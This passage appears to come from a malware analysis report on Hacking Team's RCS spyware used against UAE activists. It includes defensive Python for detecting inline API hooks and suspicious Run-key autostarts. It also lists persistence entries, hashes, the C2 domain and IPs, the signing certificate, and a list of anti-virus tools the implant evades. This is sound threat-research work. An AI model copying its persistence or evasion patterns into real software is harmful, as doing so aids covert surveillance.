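    E9 rel32 (JMP), EB rel8 (short JMP), FF 25 abs32 (JMP [ptr]), 68 imm32 C3 (PUSH/RET)."""
    lo, hi = module_range
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        kind, target = "jmp_rel32", (addr + 5 + rel) & 0xFFFFFFFF
    elif len(code) >= 2 and code[0] == 0xEB:
        rel = struct.unpack_from("<b", code, 1)[0]
        kind, target = "jmp_rel8", (addr + 2 + rel) & 0xFFFFFFFF
    elif len(code) >= 6 and code[:2] == b"\xff\x25":
        kind, target = "jmp_indirect", struct.unpack_from("<I", code, 2)[0]
    elif len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        kind, target = "push_ret", struct.unpack_from("<I", code, 1)[0]
    else:
        return None
    return kind, target, not (lo <= target < hi)

def first_difference(clean, live):
    """Offset of the first byte where the on-disk prologue and the in-memory
    prologue differ, or None if they agree over the compared length."""
    for i, (a, b) in enumerate(zip(clean, live)):
        if a != b:
            return i
    return None

# How an analyst reads a hook list: hooked API -> what the implant most likely
# does with it. Interpretation, not a documented mapping.
CAPABILITIES = [
    (r"^(Nt|Zw)QuerySystemInformation$|^RtlGetNativeSystemInformation$", "process hiding"),
    (r"^(Nt|Zw)QueryDirectoryFile$", "file hiding"),
    (r"^(Nt|Zw)(EnumerateValueKey|QueryKey)$", "registry hiding"),
    (r"^(Nt|Zw)DeviceIoControlFile$", "device/socket I/O interception"),
    (r"^CreateProcess(AsUser)?[AW]$", "injection into child processes"),
    (r"^(CreateFile|DeleteFile|MoveFile)W$", "file access monitoring"),
    (r"^ReadConsole", "console input capture"),
    (r"^(CreateWindowEx|GetMessage|PeekMessage)[AW]$", "window message interception (keystrokes)"),
    (r"^ImmGetCompositionString", "IME input capture (non-Latin keystrokes)"),
    (r"^(CreateDC[AW]|DeleteDC|StartDoc[AW]|StartPage|EndPage|EndDoc|SetAbortProc|GetDeviceCaps)$",
     "print job capture"),
]
HOOK_LINE_RE = re.compile(r"Function:\s*(?P<module>[\w.]+)!(?P<func>\w+)\s+at\s+(?P<addr>0x[0-9a-fA-F]+)")

def summarize_hooks(lines):
    """Parse 'Function: module!Name at 0x...' lines (the apihooks listing format)
    and return {capability: sorted list of hooked functions}."""
    summary = {}
    for line in lines:
        m = HOOK_LINE_RE.search(line)
        if not m:
            continue
        func = m.group("func")
        label = next((cap for pat, cap in CAPABILITIES if re.match(pat, func)), "other")
        summary.setdefault(label, set()).add(f'{m.group("module")}!{func}')
    return {k: sorted(v) for k, v in summary.items()}

# From the listing above: bytes at ntdll!NtQuerySystemInformation in the infected
# wscntfy.exe and the module range. CLEAN_BYTES is the assumed XP SP3 stub
# "mov eax, 0xad; mov edx, 0x7ffe0300; call [edx]; ret 0x10" for comparison.
NTDLL_RANGE = (0x7C900000, 0x7C9B2000)
FUNC_ADDR = 0x7C90D92E
LIVE_BYTES = bytes.fromhex("e9cd264884ba0003fe7fff12c21000")
CLEAN_BYTES = bytes.fromhex("b8ad000000ba0003fe7fff12c21000")

if __name__ == "__main__":
    print("first differing byte:", first_difference(CLEAN_BYTES, LIVE_BYTES))
    print("hook:", decode_inline_hook(FUNC_ADDR, LIVE_BYTES, NTDLL_RANGE))
    listing = [
        "Function: ntdll.dll!NtQuerySystemInformation at 0x7c90d92e",
        "Function: kernel32.dll!CreateProcessW at 0x7c802336",
        "Function: USER32.dll!GetMessageW at 0x7e4191c6",
        "Function: GDI32.dll!StartDocA at 0x77f45e79",
        "Function: imm32.dll!ImmGetCompositionStringW at 0x7639548a",
    ]
    for cap, funcs in summarize_hooks(listing).items():
        print(f"{cap}: {', '.join(funcs)}")
```

Always compare against the on-disk prologue before trusting the opcode check alone: some legitimate functions begin with a short jump, and hot-patchable Microsoft binaries begin with "mov edi, edi", so the byte-for-byte difference is the real evidence; the JMP decode then tells you where to go and dump.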





A registry key is added which ensures the persistence of the backdoor after reboot:

HKU\S-1-5-21-1177238915-1336601894-725345543-500\Software\Microsoft\Windows\CurrentVersion\Run\*Ulo4r7M
    C:\WINDOWS\system32\rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\V461MhsH.shv",F7ed728   REG_EXPAND_SZ

The file "V461MhsH.shv" appears to perform the main backdoor functionality:

1df1bd11154224bcf015db8980a3c490b1584f49d4a34dde19c19bc0662ebda2  V461MhsH.shv
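
Both Run-key entries on this page (the Mamfakinch sample's *J7PugHy and the one above) have the same shape: rundll32 loading a module with a non-DLL extension from a user-writable profile directory, calling a generated-looking export, under a value name prefixed with an asterisk (the documented RunOnce convention for "also run in Safe Mode", unusual on a plain Run value). The following added example (not from the report) scores the output of "reg query" against those indicators. The reg query text is constructed from the two entries on this page plus two benign values; the export-name pattern, the indicator threshold and the user-writable path list are heuristics assumed here.

```python
import re

# One value line of `reg query HKCU\...\Run` output: "    Name    REG_TYPE    data"
REG_VALUE_RE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")
# "rundll32.exe <module>,<export>", with or without quotes around either part
RUNDLL_RE = re.compile(
    r'^"?(?P<exe>[^"\s]*rundll32\.exe)"?\s+"?(?P<module>[^",]+?)"?\s*,\s*(?P<export>\S+)', re.I)
USER_WRITABLE = re.compile(r"\\(DOCUME~1|Documents and Settings|Users|AppData|Temp|ProgramData)\\", re.I)
LOADABLE_EXTS = (".dll", ".cpl", ".ocx", ".ax", ".drv")
# Heuristic (assumed): one or two letters followed by a run of hex digits, the
# shape of the export names seen in both samples (F1dd208, F7ed728).
RANDOM_EXPORT = re.compile(r"^[A-Za-z]{1,2}[0-9a-f]{5,}$")

def assess_run_value(name, data):
    """Score one Run-key value. Returns the list of indicators that fired."""
    indicators = []
    if name.startswith("*"):
        indicators.append("safe-mode asterisk prefix on value name")
    m = RUNDLL_RE.match(data.strip())
    if not m:
        return indicators
    indicators.append("loads via rundll32")
    module, export = m.group("module"), m.group("export")
    if USER_WRITABLE.search(module):
        indicators.append("module under a user-writable profile path")
    if not module.lower().endswith(LOADABLE_EXTS):
        indicators.append(f"module extension '{module.rsplit('.', 1)[-1]}' is not a DLL extension")
    if RANDOM_EXPORT.match(export):
        indicators.append(f"export name '{export}' looks generated")
    return indicators

def scan_reg_query_output(text, threshold=3):
    """Parse `reg query` output and return {value_name: indicators} for every
    entry that trips at least `threshold` indicators."""
    flagged = {}
    for line in text.splitlines():
        m = REG_VALUE_RE.match(line)
        if not m:
            continue
        hits = assess_run_value(m.group("name"), m.group("data"))
        if len(hits) >= threshold:
            flagged[m.group("name")] = hits
    return flagged

# Constructed `reg query` output: the two entries from this page plus two benign values.
SAMPLE_REG_QUERY = r"""
HKEY_USERS\S-1-5-21-1177238915-1336601894-725345543-500\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    NvCplDaemon    REG_SZ    RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    *J7PugHy    REG_EXPAND_SZ    C:\WINDOWS\system32\rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\IZsROY7X.-MP",F1dd208
    *Ulo4r7M    REG_EXPAND_SZ    C:\WINDOWS\system32\rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\V461MhsH.shv",F7ed728
"""

if __name__ == "__main__":
    for name, hits in scan_reg_query_output(SAMPLE_REG_QUERY).items():
        print(name)
        for h in hits:
            print("   -", h)
```

The legitimate NvCplDaemon entry shows why a single indicator is not enough: vendors do ship rundll32-based autostarts, but they load a real .dll from a system directory and call a named export.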



Further investigation of the implant reveals strings naming popular anti-rootkit and anti-virus tools, suggesting evasion of specific products:

fsm32.exe
pcts*.exe
rootkitbuster.exe
k7*.exe
avk.exe
admin.exe
avp.exe
bgscan.exe
pavark.exe
rku*.exe
svv.exe
IceSword.exe
gmer.exe
avgscanx.exe
RootkitRevealer.exe
avscan.exe
avgarkt.exe
sargui.exe
fsbl.exe
blbeta.exe
Unhackme.exe
hiddenfinder.exe
hackmon.exe
TaskMan.exe
KProcCheck.exe
We can also see the targeting of popular browsers:

chrome.exe
iexplore.exe
firefox.exe
opera.exe

And popular messaging clients:

yahoomessenger.exe
msnmsgr.exe
skype.exe
winmm.DLL
googletalk.exe
Googletalk.exe
YahooMessenger.exe



The Windows implant includes a signed AMD64 driver. The certificate was issued by VeriSign to "OPM Security Corporation":

CommonName:           OPM Security Corporation
Status:               Valid
Validity (GMT):       Mar 28, 2012 - Mar 28, 2015
Class:                Digital ID Class 3 - Software Validation
Organization:         OPM Security Corporation
Organizational Unit:  Digital ID Class 3 - Microsoft Software Validation v2 Applications
State:                Panama
City/Location:        Panama
Country:              PA
Serial Number:        21f33716e4db06fcf8641e0287e1e657
Issuer Digest:        4bc6f9b106c333db6c6a5b28e6738f7e
OPM Security appears to be a Panama-based company: [8]

Calle 50 Edificio Credicorpbank, Office 604
Panama
Republic of Panama
Telephone +507-832-7893

From their web site: [9]

"From Panama to the World, OPM Security Corporation provides personal and institutional security tools and anonymity to you and your business."

OPM Security is an OPM Corporation company. [10] On their website, http://taxhavens.us, OPM Corporation states:

"O.P.M. CORPORATION, has been one of the leading providers of Offshore services since 1992 (check 266794). Through our headquarters in Panama, our Caporaso & Partners Law Office (check 25210) and correspondent offices in South America and Caribbean, we offer the best offshore packages."

COMMAND AND CONTROL 

This malware calls back to the command and control domain ar-24.com. This domain is registered through GoDaddy:

Domain Name: AR-24.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com

As of October 1st, 2012 this domain appears to be pointing to a Linode [11] instance:

ar-24.com has address 50.116.38.37
During August 2012, for a short period, this domain resolved to 83.111.56.188:



inetnum: 83.111.56.184 - 83.111.56.191 
netname: minaoffice-EMIRNET 
descr: Office Of Sh. Tahnoon Bin Zayed Al Nahyan 
descr: P.O. Box 5151 , Abu Dhabi, UAE 
country: AE 



The physical address in this network registration record (P.O. Box 5151, Abu Dhabi, UAE) matches the address of the corporate headquarters of Royal Group, a conglomerate of companies based in the UAE.

IDENTIFICATION 

This malware contains the following strings:

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\vmplayer.exe
vixDiskMountServer.exe
[Inf. Module]: Spread to VMWare %S
- VMWare Installation OK
.vmdk"
.vmx"
VMware\preferences.ini

Rim.Desktop.exe

[Inf. Module]: Spread to Mobile Device
- WM SmartPhone Installation....OK

[Inf. Module]: Spread to USB Drive
- USB Drive Installation OK
The strings describing the virtual machine infection are the same as those described in the Symantec report on the Moroccan malware.

In addition to the similarities with the sample that Symantec and Dr. Web identified as being written by Hacking Team, "veryimportant.doc" is structurally very similar to the following sample found on VirusTotal, which uses the domain rcs-demo.hackingteam.it for command and control:

81e9647a3371568cddd0a4db597de8423179773d910d9a7b3d945cb2c3b7e1c2



This information indicates that the sample matching "veryimportant.doc" may be a demo copy of the Hacking Team RCS backdoor. Promotional materials for this backdoor advertise the following features: [12]

Remote Control System can monitor and log any action performed by means of a personal computer:

Web Browsing
Opened/Closed/Deleted Files
Keystrokes (any UNICODE language)
Printed Documents
Chat, email, instant messaging
Remote Audio Spy
Camera Snapshots
Skype Conversations

The same promotional document mentions "Zero-day exploits" as a possible remote infection vector.

An additional sample with structural similarities to the 1st and 2nd stages was discovered on VirusTotal.

This sample uses an exploit that has similarities in shellcode with "veryimportant.doc"; however, the exploit it uses is newer, the Adobe Flash Player "Matrix3D" integer overflow. [13] Searching for the origin of this exploit revealed a public mailing list post taking credit for discovery of this bug, stating: "This vulnerability was discovered by Nicolas Joly of VUPEN Security".

VUPEN is a French security company that provides a variety of services including the sale of: [14]

"...extremely sophisticated and government grade exploits specifically designed for offensive missions."

They claim to have discovered the vulnerability in January of this year, at which point they shared it with their customers, prior to public disclosure in August:

2012-01-25 - Vulnerability Discovered by VUPEN and shared with customers
2012-08-21 - Public disclosure

The sample appears to have been created in May of 2012, prior to public disclosure:

Created = 2012-05-15T10:39:00Z
Last Saved by = "1785429"
Generator = "Microsoft Office Word"
Last Modified = 2012-05-15T10:39:00Z

While VUPEN take public credit for the discovery of this bug, it is possible that the exploit used here was not written by VUPEN but was independently discovered and weaponized by another party.

RECOMMENDATIONS 

The use of social engineering and commercial surveillance software attacks against activists and dissidents is 
becoming more commonplace. 

For at risk communities, gaining awareness of targeted threats and exercising good security practices when 
using email, Skype, or any other communication mechanism are essential. Users should be vigilant concerning 
all e-mails, attached web links, and files. In particular, carefully assess the authenticity of any such materials 
referencing sensitive subject matter, activities, or containing misspellings or unusual diction. If you believe 
that you are being targeted be especially cautious when downloading files over the Internet, even from links 
that are purportedly sent by friends. 

For further tips on detecting potential malware attacks and preventing compromise, see Citizen 
Lab's recommendations for defending against targeted attacks. 
FOOTNOTES

1 http://hackingteam.it/
2 https://www.mamfakinch.com/
3 https://www.mamfakinch.com/
4 http://wikileaks.org/spyfiles/files/0/31_200810-ISS-PRG-HACKINGTEAM.pdf
5 http://hackingteam.it/index.php/about-us
6 https://en.wikipedia.org/wiki/UAE_Five
7 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333
8 http://www.opmsecurity.com/security-tools/who-we-are.html
9 http://www.opmsecurity.com/
10 http://taxhavens.us/
11 https://www.linode.com/ - A company which provides virtual server hosting.
12 http://wikileaks.org/spyfiles/files/0/31_200810-ISS-PRG-HACKINGTEAM.pdf
13 http://www.securityfocus.com/archive/1/524143/30/60/threaded
14 http://www.vupen.com/english/